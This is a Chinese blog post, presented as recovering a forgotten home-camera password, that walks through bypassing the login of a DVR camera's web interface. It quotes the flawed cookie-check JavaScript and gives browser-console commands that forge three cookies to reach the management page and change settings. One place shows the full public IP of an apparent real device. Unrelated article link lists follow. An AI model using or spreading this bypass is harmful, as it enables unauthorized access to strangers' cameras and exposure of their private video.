密码忘记找回

在生活中，摄像头随处可见。他们应用在很多方面。已经成了我们必备的工具。那他们可能有存在漏洞。

今天我对我的忘记密码家庭摄像头将进行找回

开始！

第一步:确定目标

我家的摄像头  88.248.xx.xx:80

第二步:进行登录

我忘了密码

好，我想登录摄像头。但不知道密码是多少，先来看看

摄像头的js脚本

我对之前用默认密码成功登录的页面进行抓包，找到处理页面登录逻辑的js，对处理页面登录的逻辑分析发现，存在登录绕过漏洞，代码如下：
$(document).ready(function(){
         dvr_camcnt= Cookies.get("dvr_camcnt");
         iSetAble= Cookies.get("iSetAble");
         iPlayBack= Cookies.get("iPlayBack");
         dvr_usr= Cookies.get("dvr_usr");
         dvr_pwd= Cookies.get("dvr_pwd");
         if(iSetAble== '0'){
                 $('#pb_settings').css('display','none');
                 }
         if(iPlayBack== '0'){
                 $('#pb_review').css('display','none');
                 }
         if(dvr_camcnt== null || dvr_usr == null || dvr_pwd == null)
         {
                 location.href= "/index.html";
         }

摄像头管理页面直接通过indexjs检查cookie是否为空来判断用户是否登录。这样来写登录状态判断很危险
   所以，通过伪造cookie便可以绕过登录页。通过代码可以看到需要伪造三个cookie值，dvr_camcnt，dvr_usr=admin，dvr_pwd=123。直接打开http://88.248.56.88:80/view2.html时，抓包发现会自动提交cookie的值。dvr_usr和dvr_pwd随便设置。保存后，重新刷新一下，便可以成功登录系统。

dvr_camcnt是频道为偶数就好

第三步:开始找回

这里用伪造cookie工具edit+cookie可以

不过用console指令更好

打开浏览器开发者工具，console控制台

输入以下，如图

document.cookie="dvr_camcnt=4"; document.cookie="dvr_usr=admin"; document.cookie="dvr_pwd=123";

输入

回车

若出现回显dvr_pwd=123。恭喜，成功

然后在地址栏输入http://88.248.xx.xx:80/view2.html

然后到设置里改回，成功

欢迎大佬在评论区赐教

请给予我支持，\(^o^)/关注一下吧！！！

家里摄像头密码忘记找回相关推荐

1. 忘记计算机网络域名密码,自己家里wifi密码忘记了怎么办？

   问:自家里wifi密码忘记了怎么办? 请问下,自己家wifi密码忘记了,有什么办法可以找回wifi密码? 答:wifi密码忘记了,对于很多新手用户来说,确实是一个头疼的问题. 但是,也不用担心,下面鸿 ...

2. 您与此网站建立的连接不安全_dede网站密码忘记找回服务为先

   dede网站密码忘记找回服务为先 网站安全是现在一个非常重要的课题.基本上,互联网上的所有用户群都对自己的隐私信息和企业相关信息更感兴趣.因此,无论是搭建网站还是做一些平台,用户对网站服务器和网站空间 ...

3. 宇视摄像机密码忘记找回方式（详细找回步骤）

   宇视摄像机密码忘记找回方式(详细找回步骤) IPC摄像机密码忘记,操作步骤如下: 尝试默认密码是否可以正常登陆,用户名admin,密码默认admin或者123456. 确认IPC是否有添加到上级VM平 ...

4. 有源码但后台密码忘记找回通用方法--微信猜骰子大小附带充值接口 html5游戏网站

   1.因为是thinkphp,直接找到并打开这个文件\WWW\Application\Admin\Controller\IndexController.class.php 2.第34行          ...

5. Mysql root密码忘记找回妙招

   微信公众号:IT邦德 目前B站正在直播Mysql.Oracle实战 详情关注公众号:IT邦德 QQ群:955286955.168797397 一.Mysql root用户密码忘记(8.0以下) 1.用 ...

6. SecureCRT 服务器链接信息密码忘记找回

   在日常工作和学习中,服务器常为 Linux 服务器,而主机电脑一版为 Windows 系统,在主机上如何连接 Linux 服务器,大家用到的工具也是五花八门,很多朋友都喜欢用 XShell,而我习惯用 ...

7. 域名备案号和密码忘记找回指导与坑

   域名久了,备案密码,注册邮箱,哪个接入商都记不得了,怎么办 1)通过输入身份证,可以查到你名下的备案号 2)一个备案号对应多个域名,只显示一个域名,其他域名可能也在此备案号下 3)备案号有了,找回密码 ...

8. ppoe拨号密码忘记找回方法

   1. 遇到CHAP 客户端在进行拨号时,用户名没有被加密,而密码被加密了. 在用wireshark抓到的包中,过滤RADIUS的数据包,就会看到数据包中radius协议部分的数据: 其中的authen ...

9. linux连接wifi账户密码忘了怎么办,路由器账户密码忘记了怎么办_无线路由器密码忘记了怎么找回－系统城...

   一位朋友发现家里被偷网后,想要修改wifi密码,却发现路由器的账户密码忘记了,这让他非常着急.那么当我们遇到无线路由器密码忘记了该怎么找回呢?接下来小编就给大家带来路由器账户密码找回的步骤. 具体步骤 ...

最新文章

1. 长篇自动驾驶技术综述论文（下）
2. oracle常用函数归纳
3. Leetcode 349. 两个数组的交集 (每日一题 20211014)
4. kafka自带没web ui界面，怎么办？安装个第三方的
5. mysql 不用缓存_mysql有自己的缓存机制，为什么还要用redis和memcac? 爱问知识人
6. canvas drawImage方法不显示图片的解决方案
7. Bailian4149 课程大作业【DP】
8. [python实现设计模式]-3.简单工厂模式-触宝开放平台
9. matlab 的 legend 用法
10. 2020ccks知识图谱问答总结
11. xshell卸载注册表删除问题
12. 线性独立成分分析(ICA)与鸡尾酒会问题
13. 机械原理c语言程序,机械原理课程设计心得体会范文
14. 深度学习中使用Screen 指令进行离线训练
15. ecb里使用自定义快捷键切换窗口
16. python中#!含义
17. matlab程序算天气,科学网—站点气温数据的积温计算（含Matlab程序实现） - 朱永超的博文...
18. 华夏幸福转让平安资管5.69%股份，价款合计42.03亿
19. （附Matlab程序）（二）基于DCT编码的图像压缩：对分解后的每个数据小方块进行DCT及IDCT变换
20. form表单与模板引擎

热门文章

1. 【BPM架构】BPM 平台：独立还是微服务实现
2. CanOpen Message
3. 开关电源模块并联供电系统_水冷风冷高频开关电源直流整流器
4. 什么！？改BUG最牛的人竟然是一位皇帝！！集合前来觐见！
5. 定制office2007静默安装
6. ModuleNotFoundError:No module named ‘googlemaps‘
7. 女王大学 计算机专业,伦敦玛丽女王大学计算机科学专业
8. STM32F407学习笔记——MG90S舵机模块（基本控制）
9. 命题作文：Dimension Tree区间查找与IP数据包分类
10. 计算机宣传部职责,计算机系团总支宣传部第一学期工作总结